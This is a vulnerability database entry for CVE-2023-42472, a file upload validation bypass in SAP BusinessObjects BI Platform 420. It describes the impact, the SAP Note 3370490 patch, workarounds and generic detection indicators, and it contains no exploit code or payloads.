Login Sign Up

CVE-2023-42472

8.7 HIGH

📋 TL;DR

This vulnerability allows authenticated attackers to bypass file type validation in SAP BusinessObjects Business Intelligence Platform's Web Intelligence HTML interface. By intercepting and modifying image upload requests, attackers can read and modify sensitive data. This affects organizations using SAP BusinessObjects BI Platform version 420.

💻 Affected Systems

Products:
  • SAP BusinessObjects Business Intelligence Platform
Versions: Version 420
Operating Systems: All supported platforms
Default Config Vulnerable: ⚠️ Yes
Notes: Requires authenticated access to the Web Intelligence HTML interface.

📦 What is this software?

Businessobjects Business Intelligence Platform by Sap

View all CVEs affecting Businessobjects Business Intelligence Platform →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could exfiltrate sensitive business data, modify financial reports, or inject malicious content into business intelligence systems.

🟠

Likely Case

Unauthorized access to confidential business reports and data manipulation within the BI platform.

🟢

If Mitigated

Limited impact with proper network segmentation and strict access controls preventing unauthorized users from accessing the interface.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Requires authentication and ability to intercept/modify network traffic.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Apply SAP Note 3370490

Vendor Advisory: https://me.sap.com/notes/3370490

Restart Required: Yes

Instructions:

1. Download and apply SAP Note 3370490. 2. Restart the SAP BusinessObjects BI Platform services. 3. Verify the patch is applied correctly.

🔧 Temporary Workarounds

Restrict Network Access

all

Limit access to the Web Intelligence HTML interface to trusted networks only.

Implement WAF Rules

all

Configure web application firewall to block suspicious file upload patterns.

🧯 If You Can't Patch

  • Implement strict network segmentation to isolate the BI platform from untrusted networks.
  • Enforce least privilege access controls and monitor all authenticated user activity.

🔍 How to Verify

Check if Vulnerable:

Check if SAP BusinessObjects BI Platform version 420 is installed without SAP Note 3370490 applied.

Check Version:

Check SAP system information or consult SAP administration tools for version details.

Verify Fix Applied:

Verify SAP Note 3370490 is applied in the system and test file upload functionality with modified content types.

📡 Detection & Monitoring

Log Indicators:

  • Unusual file upload patterns
  • Modified content-type headers in upload requests
  • Failed file validation attempts

Network Indicators:

  • Intercepted/modified HTTP requests to upload endpoints
  • Suspicious file extensions in upload traffic

SIEM Query:

Search for file upload events with content-type mismatches or unusual file extensions in web server logs.

📊 Metadata

CVE ID: CVE-2023-42472
CVSS v3 Score: 8.7 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
CWE: CWE-434
Published: September 12, 2023
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-42472, you might also want to check these:

CVE-2024-52490 10.0

This vulnerability allows attackers to upload arbitrary files, including web shells, to Pathomation ...

Same vulnerability type (CWE-434)
CVE-2024-43160 10.0

CVE-2024-43160 is an unauthenticated arbitrary file upload vulnerability in the BerqWP WordPress plu...

Same vulnerability type (CWE-434)
CVE-2024-8940 10.0

CVE-2024-8940 is a critical unrestricted file upload vulnerability in Scriptcase version 9.4.019 tha...

Same vulnerability type (CWE-434)